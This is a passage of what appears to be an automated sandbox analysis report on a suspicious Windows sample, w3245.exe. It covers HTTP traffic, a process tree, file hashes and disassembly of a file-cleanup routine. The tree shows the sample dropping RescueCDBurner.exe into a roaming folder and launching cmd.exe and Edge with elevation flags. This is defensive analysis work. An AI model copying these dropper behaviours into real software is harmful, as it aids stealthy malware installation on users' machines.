                                                                                                                                                                  2025-01-06 22:19:00 UTC940OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 39 38 39 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 31 38 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 33 2e 31 30 37 2e 36 2e 31 35 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 31 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 62 69 6e
                                                                                                                                                                  Data Ascii: [{"age":59899,"body":{"elapsed_time":2183,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"13.107.6.158","status_code":401,"type":"http.error"},"type":"network-error","url":"https://business.bin
                                                                                                                                                                  2025-01-06 22:19:00 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Kestrel
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:19:00 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  PMUSER_FORMAT_QS:
                                                                                                                                                                  X-CDN-TraceId: 0.8d872c17.1736201940.b26778
                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                  Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                  Access-Control-Allow-Origin: *


                                                                                                                                                                  Statistics

                                                                                                                                                                  CPU Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  Memory Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                  Behavior

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  System Behavior

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:0
                                                                                                                                                                  Start time:17:16:34
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Users\user\Desktop\w3245.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\w3245.exe"
                                                                                                                                                                  Imagebase:0x900000
                                                                                                                                                                  File size:15'806'278 bytes
                                                                                                                                                                  MD5 hash:E92B4D3EE13DA899EA0AD5B54A0094ED
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:1
                                                                                                                                                                  Start time:17:16:34
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=688 -burn.filehandle.self=692
                                                                                                                                                                  Imagebase:0xc80000
                                                                                                                                                                  File size:15'692'672 bytes
                                                                                                                                                                  MD5 hash:EC4072E1AE2A9316270E6AFD66235A97
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:2
                                                                                                                                                                  Start time:17:16:36
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
                                                                                                                                                                  Imagebase:0x5d0000
                                                                                                                                                                  File size:6'487'736 bytes
                                                                                                                                                                  MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:3
                                                                                                                                                                  Start time:17:16:38
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                                  Imagebase:0x5d0000
                                                                                                                                                                  File size:6'487'736 bytes
                                                                                                                                                                  MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:4
                                                                                                                                                                  Start time:17:16:39
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:5
                                                                                                                                                                  Start time:17:16:39
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:10
                                                                                                                                                                  Start time:17:17:05
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe"
                                                                                                                                                                  Imagebase:0x5d0000
                                                                                                                                                                  File size:6'487'736 bytes
                                                                                                                                                                  MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:11
                                                                                                                                                                  Start time:17:17:05
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:12
                                                                                                                                                                  Start time:17:17:05
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:13
                                                                                                                                                                  Start time:17:17:06
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                  File size:2'364'728 bytes
                                                                                                                                                                  MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:14
                                                                                                                                                                  Start time:17:17:25
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                  File size:2'364'728 bytes
                                                                                                                                                                  MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:15
                                                                                                                                                                  Start time:17:17:52
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:16
                                                                                                                                                                  Start time:17:17:53
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1980,i,14784043117474670596,10515819180786233861,262144 /prefetch:3
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:18
                                                                                                                                                                  Start time:17:17:53
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:19
                                                                                                                                                                  Start time:17:17:54
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:3
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:22
                                                                                                                                                                  Start time:17:17:58
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6740 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:23
                                                                                                                                                                  Start time:17:17:58
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:24
                                                                                                                                                                  Start time:17:18:01
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
                                                                                                                                                                  Imagebase:0x7ff7ee2b0000
                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                  MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:25
                                                                                                                                                                  Start time:17:18:01
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
                                                                                                                                                                  Imagebase:0x7ff7ee2b0000
                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                  MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:27
                                                                                                                                                                  Start time:17:18:14
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:28
                                                                                                                                                                  Start time:17:18:15
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1516 --field-trial-handle=2100,i,1290917253854219451,795298086300262693,262144 /prefetch:3
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:29
                                                                                                                                                                  Start time:17:18:22
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:30
                                                                                                                                                                  Start time:17:18:23
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=952 --field-trial-handle=1852,i,10935174027407288712,12025004199992672972,262144 /prefetch:3
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:31
                                                                                                                                                                  Start time:17:18:54
                                                                                                                                                                  Start date:06/01/2025
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  Disassembly

                                                                                                                                                                  Reset < >

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 00903CC4 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 320fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 864 903cc4-903d51 call 92f8e0 * 2 GetFileAttributesW 869 903d53-903d5a GetLastError 864->869 870 903d85-903d88 864->870 871 903d5c-903d5e 869->871 872 903d5f-903d61 869->872 873 9040d5 870->873 874 903d8e-903d91 870->874 871->872 875 903d63-903d6c 872->875 876 903d6e 872->876 877 9040da-9040e3 873->877 878 903d93-903da6 SetFileAttributesW 874->878 879 903dca-903dd1 874->879 875->876 876->870 882 903d70-903d71 876->882 883 9040e5-9040e6 FindClose 877->883 884 9040ec-9040f3 877->884 878->879 885 903da8-903dae GetLastError 878->885 880 903de0-903de8 879->880 881 903dd3-903dda 879->881 887 903e25-903e40 call 902d58 880->887 888 903dea-903dfe GetTempPathW 880->888 881->880 886 904058 881->886 889 903d76-903d80 call 903821 882->889 883->884 890 904100-904112 call 92e06f 884->890 891 9040f5-9040fb call 945636 884->891 892 903db0-903db9 885->892 893 903dbb 885->893 896 90405e-90406c RemoveDirectoryW 886->896 887->884 912 903e46-903e62 FindFirstFileW 887->912 888->887 897 903e00-903e06 GetLastError 888->897 889->884 891->890 892->893 894 903dc2-903dc8 893->894 895 903dbd 893->895 894->889 895->894 896->877 902 90406e-904074 GetLastError 896->902 903 903e13 897->903 904 903e08-903e11 897->904 908 904076-904079 902->908 909 90407f-904085 902->909 910 903e15 903->910 911 903e1a-903e20 903->911 904->903 908->909 915 9040a1-9040a3 909->915 916 904087-904089 909->916 910->911 911->889 913 903e64-903e6a GetLastError 912->913 914 903e89-903e93 912->914 917 903e77 913->917 918 903e6c-903e75 913->918 919 903e95-903e9e 914->919 920 903eba-903ee0 call 902d58 914->920 915->877 921 9040a5-9040ab 915->921 916->921 922 90408b-90409d MoveFileExW 916->922 924 903e79 917->924 925 903e7e-903e7f 917->925 918->917 926 903ea4-903eab 919->926 927 903fbd-903fcd FindNextFileW 919->927 920->877 938 903ee6-903ef3 920->938 923 903ffa-904004 call 903821 921->923 922->921 929 90409f 922->929 923->877 924->925 925->914 926->920 933 903ead-903eb4 926->933 930 90404d-904052 GetLastError 927->930 931 903fcf-903fd5 927->931 929->915 935 9040b0-9040b6 GetLastError 930->935 936 904054-904056 930->936 931->914 933->920 933->927 939 9040c3 935->939 940 9040b8-9040c1 935->940 936->896 941 903f22-903f29 938->941 942 903ef5-903ef7 938->942 943 9040c5 939->943 944 9040ca-9040d0 939->944 940->939 945 903fb7 941->945 946 903f2f-903f31 941->946 942->941 947 903ef9-903f09 call 902b0c 942->947 943->944 944->923 945->927 949 903f33-903f46 SetFileAttributesW 946->949 950 903f4c-903f5a DeleteFileW 946->950 947->877 954 903f0f-903f18 call 903cc4 947->954 949->950 952 903fda-903fe0 GetLastError 949->952 950->945 953 903f5c-903f5e 950->953 955 903fe2-903feb 952->955 956 903fed 952->956 957 903f64-903f81 GetTempFileNameW 953->957 958 90402b-904031 GetLastError 953->958 968 903f1d 954->968 955->956 962 903ff4-903ff5 956->962 963 903fef 956->963 964 903f87-903fa4 MoveFileExW 957->964 965 904009-90400f GetLastError 957->965 959 904033-90403c 958->959 960 90403e 958->960 959->960 966 904040 960->966 967 904045-90404b 960->967 962->923 963->962 971 903fa6-903fad 964->971 972 903faf 964->972 969 904011-90401a 965->969 970 90401c 965->970 966->967 967->923 968->945 969->970 973 904023-904029 970->973 974 90401e 970->974 975 903fb5 MoveFileExW 971->975 972->975 973->923 974->973 975->945
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00903D40
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00903D53
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 00903D9E
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00903DA8
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 00903DF6
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00903E00
                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 00903E53
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00903E64
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 00903F3E
                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 00903F52
                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 00903F79
                                                                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 00903F9C
                                                                                                                                                                    • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00903FB5
                                                                                                                                                                    • FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 00903FC5
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00903FDA
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00904009
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0090402B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0090404D
                                                                                                                                                                    • RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00904064
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0090406E
                                                                                                                                                                    • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00904095
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 009040B0
                                                                                                                                                                    • FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 009040E6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
